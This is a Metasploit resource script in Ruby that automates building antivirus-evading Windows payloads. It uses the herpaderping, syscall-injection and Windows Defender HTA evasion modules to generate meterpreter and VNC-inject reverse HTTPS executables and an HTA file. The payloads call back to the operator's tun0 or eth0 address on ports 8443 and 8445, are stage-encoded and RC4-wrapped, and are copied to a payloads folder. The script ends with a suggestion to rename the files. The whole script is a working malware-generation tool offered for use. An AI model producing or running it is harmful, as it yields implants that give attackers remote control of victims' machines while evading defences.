<ruby>
PAYLOAD = 'windows/x64/meterpreter/reverse_https'

def payload_lhost
  tun0_ip = %x(ip addr show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1).strip
  if tun0_ip.empty?
    %x(ip addr show eth0 | grep "inet " | awk '{print $2}' | cut -d/ -f1).strip
  else
    tun0_ip
  end
end

def payload_lport
  framework.datastore['LPORT'] || 8443
end



print_status("#{PAYLOAD}'s LHOST=#{payload_lhost}, LPORT=#{payload_lport}")
run_single('use evasion/windows/process_herpaderping')
run_single("set payload #{PAYLOAD}")
run_single("set AUTOLOADSTDAPI false")
run_single("set FILENAME bypass.herpaderping.winx64.exe")
run_single("set AutoUnhookProcess true")
run_single("set AutoSystemInfo false")
run_single("set EnableStageEncoding true")
run_single("set lhost #{payload_lhost}")
run_single("set lport #{payload_lport}")
run_single('run')

system("cp ~/.msf4/local/bypass.herpaderping.winx64.exe ../payloads/bypass.herpaderping.winx64.exe")

run_single('use evasion/windows/syscall_inject')
run_single("set CIPHER rc4")
run_single("set payload windows/x64/meterpreter/reverse_https")
run_single("set AUTOLOADSTDAPI false")
run_single("set FILENAME bypass.syscall_inject.winx64.exe")
run_single("set AutoUnhookProcess true")
run_single("set AutoSystemInfo false")
run_single("set EnableStageEncoding true")
run_single("set lhost #{payload_lhost}")
run_single("set lport #{payload_lport}")
run_single('run')
system("cp ~/.msf4/local/bypass.syscall_inject.winx64.exe ../payloads/bypass.syscall_inject.winx64.exe")



run_single('use evasion/windows/process_herpaderping')
run_single("set payload windows/x64/vncinject/reverse_https")
run_single("set AUTOLOADSTDAPI false")
run_single("set FILENAME bypass.herpaderping.vnc.winx64.exe")
run_single("set AutoUnhookProcess true")
run_single("set AutoSystemInfo false")
run_single("set EnableStageEncoding true")
run_single("set lhost #{payload_lhost}")
run_single("set lport #{payload_lport}")
run_single('run')

system("cp ~/.msf4/local/bypass.herpaderping.vnc.winx64.exe ../payloads/bypass.herpaderping.vnc.winx64.exe")

run_single('use evasion/windows/syscall_inject')
run_single("set CIPHER rc4")
run_single("set payload windows/x64/vncinject/reverse_https")
run_single("set AUTOLOADSTDAPI false")
run_single("set FILENAME bypass.syscall_inject.vnc.winx64.exe")
run_single("set AutoUnhookProcess true")
run_single("set AutoSystemInfo false")
run_single("set EnableStageEncoding true")
run_single("set lhost #{payload_lhost}")
run_single("set lport 8445")
run_single('run')
system("cp ~/.msf4/local/bypass.syscall_inject.vnc.winx64.exe ../payloads/bypass.syscall_inject.vnc.winx64.exe")



run_single('use evasion/windows/windows_defender_js_hta')
run_single("set payload windows/x64/meterpreter/reverse_https")
run_single("set AUTOLOADSTDAPI false")
run_single("set FILENAME bypass.defender.winx64.js.hta")
run_single("set AutoUnhookProcess true")
run_single("set AutoSystemInfo false")
run_single("set EnableStageEncoding true")
run_single("set lhost #{payload_lhost}")
run_single("set lport 8445")
run_single('run')
system("cp ~/.msf4/local/bypass.defender.winx64.js.hta ../payloads/bypass.defender.winx64.js.hta")
print_status("##########################################################################################################################################################################################")
print_status("##########################################################################################################################################################################################")
print_status(" ")
print_status(" ")
print_status(" ")
print_status(" ")
print_status(" ")
print_status(" ")
print_status("Payload bypass.herpaderping.winx64.exe & bypass.syscall_inject.winx64.exe & bypass.defender.winx64.exe & bypass.defender.winx64.js.hta & bypass.syscall_inject.vnc.winx64.exe & bypass.herpaderping.vnc.winx64.exe copied to ../payloads")
print_status(" ")
print_status("Generated with windows/x64/meterpreter/reverse_https, port 8443 or windows/x64/vncinject/reverse_https (for .vnc) on port 8445.")
print_status(" ")
print_status("Probably change the names of the payloads to something else?")
print_status(" ")
print_status(" ")
print_status(" ")
print_status(" ")
print_status(" ")
print_status(" ")
print_status("##########################################################################################################################################################################################")
print_status("##########################################################################################################################################################################################")


run_single('exit')
sleep(1)
</ruby>